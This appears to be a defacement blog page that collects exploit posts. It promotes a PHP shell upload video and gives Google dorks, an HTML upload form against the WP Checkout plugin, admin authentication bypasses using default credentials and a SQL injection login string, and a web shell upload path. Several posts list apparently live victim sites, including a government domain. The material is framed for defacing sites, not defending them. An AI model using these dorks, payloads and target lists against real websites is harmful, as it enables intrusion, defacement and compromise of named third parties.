Showing posts with label Deface. Show all posts

DEFACE: PHP FILE MANAGER SHELL UPLOAD METHOD


After a long time without doing any defacing, I idly went looking for an exploit and am sharing it right away for those of you who want to learn defacing. Method: PHP file manager upload shell.
Note: Sorry, the audio stutters.
Don't forget to subscribe to the channel too.
By: E7B_404
From: Channel 4Sekawan
Team: Garuda Security Hacker

WordPress Plugins WP Checkout - Arbitrary File Upload


# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

EasyWebEditor 8.6 Authentication Bypass



# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=

# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Linux
--------------------------------------
Exploit:/ewtadmin

http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com

NB: this PoC can be used for SQL / admin bypass

Zamikinfotech Admin-Login Bypass


Google Dork : Designed By zamikinfotech.in™
Tested on : Kali Linux
Date : 2017-06-01
Blog : http://www.trazer.org/
Forum : http://www.turkz.org/Forum/ 

Tutorial :

[+] Dorking in Google or other search engine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345
OR
[+] Username: '=' 'or'
[+] Password: '=' 'or'

Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php

UpDone check Shell Upload Vulnerability


# Exploit Title : UpDone check Shell Upload Vulnerability
# Exploit Author : 
# Dork : intext:UpDone check :/sites/default/files/up.php
# Tested on : Win 10
#################################################################################

# [+] Exploit : site.com/sites/default/files/up.php
#
# [+] File Location : site.com/sites/default/files/your_file.php
#
# [+] Live Demo : http://toy-info.kz/sites/default/files/up.php
#
#################################################################################
# Forum: https://forum.errorviolence.com/index.php
# Website: https://errorviolence.com/
# Discovered By: MD15